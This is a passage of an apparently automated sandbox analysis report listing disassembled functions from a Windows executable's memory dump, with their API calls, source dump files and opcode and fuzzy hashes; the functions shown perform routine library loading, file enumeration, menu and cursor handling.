                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f90212481b0829995c930a53c7acd5c1d2ca0672da2f778c3c159a35fad60eb8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1097081faf8e12b72459453f22f39748745641366cc83a46a0cb0e3cd7246884
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f90212481b0829995c930a53c7acd5c1d2ca0672da2f778c3c159a35fad60eb8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE04FE1B40B1112D71066BA5C82B6B158E4B84724F90443B3994E62C3DDBCD9885A5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042EB64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAE0), ref: 0042EB72
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB78
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-260599015
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0fcc82f810ad7712b712005734c0e7e7f4c4755c19e1c7144c512dae05afdcd4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 186c8a8b24504359f9bd95d8817b94a00a7cf61d77d8ea7090d5fad6c77db3b3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fcc82f810ad7712b712005734c0e7e7f4c4755c19e1c7144c512dae05afdcd4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CD0C792312732666D10F1F73CD1DBB098C89116753544477F505E5241D55DDD01196D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0044F754 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: NotifyWinEvent$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-597752486
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d260ac245a95ba778a84e64f4678a7c97134b6bce19bccee0962fec8ae9a2771
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: adaf68bc035e952e092e397114f6a1653fed54d9058db7208dfb757fc5d15743
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d260ac245a95ba778a84e64f4678a7c97134b6bce19bccee0962fec8ae9a2771
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7E012F4E417049DEF00BBF5BA86B1E3A90E764718B01417FF404A62A2DB7C440C8E5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00498338 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-834958232
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9cb413b2176f50c76fea63ef53080ec325e820140f3784e0ca009a77fe8837c6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7eda4cb16e2cba450c320cc229382d7be1fc12bfd2fbc27455de3eb8489cf644
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cb413b2176f50c76fea63ef53080ec325e820140f3784e0ca009a77fe8837c6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88B092C128174298AC7032FA0C02A1F08084882F28718083F3C48F50C2CD6ED804182D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00464960 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-2683653824
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6679ec7baf936cfa82dcc9dbfb17d68d2c51c027667db27e6010a1916441cd76
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ef62b78e1ecbbf86accf82cc5e54c74759ffbda80f6f2c7107c350d82a6c33f4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6679ec7baf936cfa82dcc9dbfb17d68d2c51c027667db27e6010a1916441cd76
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48B092E06E2700A88E00B7FA2887B0B104895D0B1DB56063F704979092EB7C4008CD6E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047D334 Relevance: 6.2, APIs: 4, Instructions: 195fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E), ref: 0047D484
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,0047D4AF,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E,00000000), ref: 0047D4A2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2066263336-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8e11c2e85c2ccaffd34a83076676189e08046c434ae76c0902574934c104601f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2979fa4f850f67a6d1e6d53d287e6b8f4dfe67a5ddfa55c2aaa4ecb03bfc0e13
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e11c2e85c2ccaffd34a83076676189e08046c434ae76c0902574934c104601f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA812D70D0024DAFDF11DFA5CC55ADFBBB9EF49308F5080AAE808A7291D6399A46CF54
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047F804 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?,00000000), ref: 0047F8AA
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?), ref: 0047F8B7
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D), ref: 0047F9AC
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,0047F9D7,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?), ref: 0047F9CA
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2066263336-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a51c321032a6822f8687f4756751f7508677d78abc23393d1367f70f4628dca3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d4c1b09f85a1e3ce5f066f5119f691750f955bf6e0a6470712ab8dbd39f482a6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a51c321032a6822f8687f4756751f7508677d78abc23393d1367f70f4628dca3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80513E71A00648AFCB10EF65CC45ADEB7B8AB88315F1085BAA818E7351D7389F49CF59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00421284 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetMenu.USER32(00000000), ref: 00421371
                                                                                                                                                                                                                                                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                                                                                                                                                                                                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                                                                                                                                                                                                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Menu
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3711407533-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7918b5ac66a49b7c70f092078a7f06842b1ce09055eaa5e04548cec6233339c2
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D41A13070025447EB20EA79A9857AB26969F69318F4805BFFC44DF3A3CA7DDC45839D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047581C Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042EE40: GetTickCount.KERNEL32 ref: 0042EE46
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00475991,?,?,0049C1D0,00000000), ref: 0047587A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CountErrorFileLastMoveTick
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2406187244-2685451598
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a5292f3fc03db17f232a6b1eb5866422a84a5f902c55e2ebf2631d7528b3b0b0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ae0701305b01ce1bca9537847079d861391bf026d2cb8563746cd807755024f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5292f3fc03db17f232a6b1eb5866422a84a5f902c55e2ebf2631d7528b3b0b0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB4166B0A006098FDB10EFA5D882ADE77B5EF48314F60853BE514BB351D7789A058BA9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00413D08 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00413D56
                                                                                                                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418ED0: 6FA2C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418EEC
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418F09
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CursorDesktopWindow$Show
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2074268717-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 95de96b99ba854305cf3f6c98da1fc171ffd9c3687d173b50ed20deed18b133b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
